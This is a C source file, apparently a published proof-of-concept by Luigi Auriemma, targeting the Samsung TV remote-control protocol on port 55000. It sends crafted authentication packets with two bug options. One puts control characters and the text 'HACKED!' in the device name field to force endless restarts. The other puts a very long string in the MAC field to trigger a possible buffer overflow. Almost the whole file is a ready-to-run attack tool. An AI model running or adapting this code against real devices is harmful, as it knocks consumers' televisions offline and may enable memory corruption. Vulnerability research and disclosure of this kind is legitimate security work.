/*
by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <time.h>
#include <inttypes.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stricmp strcasecmp
    #define stristr strcasestr
    #define strnicmp strncasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      0xffff  // don't touch



int samsung_send(int sd, u8 *head, u8 *data, int datasz);
int samsung_recv(int sd, u8 *data);
int tcp_send(int sd, u8 *buff, int len);
int tcp_recv(int sd, u8 *buff, int len);
u8 *base64_encode(u8 *data, int *size);
u8 *base64_decode(u8 *data, int *size);
int putsx(u8 *data, u8 *str, int b64);
int putss(u8 *data, u8 *str);
int putmm(u8 *data, u8 *mem, int len);
int putcc(u8 *data, int chr, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
void show_dump(int left, unsigned char *data, unsigned int len, FILE *stream);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            bug,
            len;
    u16     port    = 55000;
    u8      *host,
            *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Samsung TV Remote Controller vulnerabilities " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%d)]\n"
            "\n"
            "Bugs:\n"
            " 1 = endless restarts\n"
            " 2 = possible buffer-overflow\n"
            "\n", argv[0], port);
        exit(1);
    }

    bug  = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ + 1);
    if(!buff) std_err();

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
      < 0) std_err();
    printf("- connected\n");

    p = buff;
    p += putxx(p, 100, 16);                             // ???
    p += putsx(p, "127.0.0.1", 1);                      // IP
    if(bug == 2) p += putsx(p, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", 1);
    else         p += putsx(p, "00-00-00-00-00-00", 1); // MAC
    if(bug == 1) p += putsx(p, "\n\n\n\t\t\t\tHACKED!\n\n\n\n\n", 1);
    else         p += putsx(p, "TEST", 1);              // name
    if(samsung_send(sd, "iphone..iapp.samsung", buff, p - buff) < 0) goto quit;
    len = samsung_recv(sd, buff);
    if(len < 0) goto quit;

quit:
    close(sd);
    printf("- done\n");
    return(0);
}



int samsung_send(int sd, u8 *head, u8 *data, int datasz) {
    static u8   *buff = NULL;
    static int  cnt = 0;
    int     headsz;
    u8      *p;

    headsz = strlen(head);
    if(headsz < 0) return(-1);
    if(headsz > 0xffff) return(-1);
    if(datasz < 0) return(-1);
    if(datasz > 0xffff) return(-1);

    buff = realloc(buff, 1 + 2 + headsz + 2 + datasz);
    if(!buff) std_err();

    printf("\n- start sending:\n");
    printf("  %.*s:\n", headsz, head);
    show_dump(2, data, datasz, stdout);

    p = buff;
    p += putxx(p, cnt++, 8);
    p += putxx(p, headsz, 16);
    p += putmm(p, head, headsz);
    p += putxx(p, datasz, 16);
    p += putmm(p, data, datasz);
    if(tcp_send(sd, buff, p - buff) < 0) return(-1);
    printf("- %d bytes sent\n", datasz);
    return(0);
}



int samsung_recv(int sd, u8 *buff) {
    u32     len;
    u8      tmp[2];

    printf("\n- start receiving:\n");
    if(tcp_recv(sd, tmp, 1) < 0) return(-1);    // cnt
    if(tcp_recv(sd, tmp, 2) < 0) return(-1);    // header len
    getxx(tmp, &len, 16);
    if(tcp_recv(sd, buff, len) < 0) return(-1); // header
    printf("  %.*s:\n", len, buff);
    if(tcp_recv(sd, tmp, 2) < 0) return(-1);    // data len
    getxx(tmp, &len, 16);
    if(tcp_recv(sd, buff, len) < 0) return(-1); // data
    show_dump(2, buff, len, stdout);
    printf("- %d bytes received\n", len);
    return(len);
}



int tcp_send(int sd, u8 *buff, int len) {
    if(len <= 0) return(0);
    if(send(sd, buff, len, 0) != len) return(-1);
    return(len);
}



int tcp_recv(int sd, u8 *buff, int len) {
    int     t;
    u8      *p,
            c;

    if(len <= 0) return(0);
    for(p = buff; len; p += t, len -= t) {
        if(sd > 0) {
            if(timeout(sd, 3) < 0) return(-1);
        }
        if(buff) {
            t = recv(sd, p, len, 0);
        } else {
            t = recv(sd, &c, 1, 0);
        }
        if(t <= 0) return(-1);
    }
    len = p - buff;
    return(len);
}



u8 *base64_encode(u8 *data, int *size) {
    int     len,
            a,
            b,
            c;
    u8      *buff,
            *p;
    static const u8 base[64] = {
        'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
        'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
        'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
        'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
    };

    if(!size || (*size < 0)) {      // use size -1 for auto text size!
        len = strlen(data);
    } else {
        len = *size;
    }
    buff = malloc(((len / 3) << 2) + 6);
    if(!buff) return(NULL);

    p = buff;
    do {
        a = data[0];
        b = data[1];
        c = data[2];
        *p++ = base[(a >> 2) & 63];
        *p++ = base[(((a &  3) << 4) | ((b >> 4) & 15)) & 63];
        *p++ = base[(((b & 15) << 2) | ((c >> 6) &  3)) & 63];
        *p++ = base[c & 63];
        data += 3;
        len  -= 3;
    } while(len > 0);
    for(*p = 0; len < 0; len++) *(p + len) = '=';

    if(size) *size = p - buff;
    return(buff);
}



u8 *base64_decode(u8 *data, int *size) {
    int     len,
            xlen,
            a   = 0,
            b   = 0,
            c,
            step;
    u8      *buff,
            *limit,
            *p;
    static const u8 base[128] = {   // supports also the Gamespy base64
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x3e,0x00,0x3e,0x00,0x3f,
        0x34,0x35,0x36,0x37,0x38,0x39,0x3a,0x3b,0x3c,0x3d,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,0x0a,0x0b,0x0c,0x0d,0x0e,
        0x0f,0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0x18,0x19,0x3e,0x00,0x3f,0x00,0x3f,
        0x00,0x1a,0x1b,0x1c,0x1d,0x1e,0x1f,0x20,0x21,0x22,0x23,0x24,0x25,0x26,0x27,0x28,
        0x29,0x2a,0x2b,0x2c,0x2d,0x2e,0x2f,0x30,0x31,0x32,0x33,0x00,0x00,0x00,0x00,0x00
    };

    if(!size || (*size < 0)) {      // use size -1 for auto size!
        len = strlen(data);
    } else {
        len = *size;
    }
    xlen = ((len >> 2) * 3) + 1;    // NULL included in output for text
    buff = malloc(xlen);
    if(!buff) return(NULL);

    p = buff;
    limit = data + len;

    for(step = 0; /* data < limit */; step++) {
        do {
            if(data >= limit) {
                c = 0;
                break;
            }
            c = *data;
            data++;
            if((c == '=') || (c == '_')) {  // supports also the Gamespy base64
                c = 0;
                break;
            }
            if(c == '%') {
                if(sscanf(data, "%02x", &c) != 1) {
                    c = 0;
                    break;
                }
                data += 2;
            }
        } while(c && ((c <= ' ') || (c > 0x7f)));
        if(!c) break;

        switch(step & 3) {
            case 0: {
                a = base[c];
                break;
            }
            case 1: {
                b = base[c];
                *p++ = (a << 2)        | (b >> 4);
                break;
            }
            case 2: {
                a = base[c];
                *p++ = ((b & 15) << 4) | (a >> 2);
                break;
            }
            case 3: {
                *p++ = ((a & 3) << 6)  | base[c];
                break;
            }
        }
    }
    *p = 0;

    len = p - buff;
    if(size) *size = len;
    if((len + 1) != xlen) {             // save memory
        buff = realloc(buff, len + 1);  // NULL included!
        if(!buff) return(NULL);
    }
    return(buff);
}



int putsx(u8 *data, u8 *str, int b64) {
    int     len;
    u8      *bstr   = NULL,
            *p;

    if(b64) {
        bstr = base64_encode(str, NULL);
        str = bstr;
    }

    len = strlen(str);
    p = data;
    p += putxx(p, len, 16);
    p += putmm(p, str, len);
    if(bstr) free(bstr);
    return(p - data);
}



int putss(u8 *data, u8 *str) {
    return(putmm(data, str, -1));
}



int putmm(u8 *data, u8 *mem, int len) {
    if(len < 0) len = strlen(mem);
    memcpy(data, mem, len);
    return(len);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    if(bits <= 4) bytes = bits;
    else          bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
        //num |= (data[i] << ((bytes - 1 - i) << 3));
    }
    if(ret) *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    if(bits <= 4) bytes = bits;
    else          bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = num >> (i << 3);
        //data[i] = num >> ((bytes - 1 - i) << 3);
    }
    return(bytes);
}



void show_dump(int left, unsigned char *data, unsigned int len, FILE *stream) {
    int                 rem;
    static const char   hex[16] = "0123456789abcdef";
    unsigned char       leftbuff[80],
                        buff[67],
                        chr,
                        *bytes,
                        *p,
                        *limit,
                        *glimit = data + len;

    memset(buff + 2, ' ', 48);
    memset(leftbuff, ' ', sizeof(leftbuff));

    while(data < glimit) {
        limit = data + 16;
        if(limit > glimit) {
            limit = glimit;
            memset(buff, ' ', 48);
        }

        p     = buff;
        bytes = p + 50;
        while(data < limit) {
            chr = *data;
            *p++ = hex[chr >> 4];
            *p++ = hex[chr & 15];
            p++;
            *bytes++ = ((chr < ' ') || (chr >= 0x7f)) ? '.' : chr;
            data++;
        }
        *bytes++ = '\n';

        for(rem = left; rem >= sizeof(leftbuff); rem -= sizeof(leftbuff)) {
            fwrite(leftbuff, sizeof(leftbuff), 1, stream);
        }
        if(rem > 0) fwrite(leftbuff, rem, 1, stream);
        fwrite(buff, bytes - buff, 1, stream);
    }
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        }
        host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


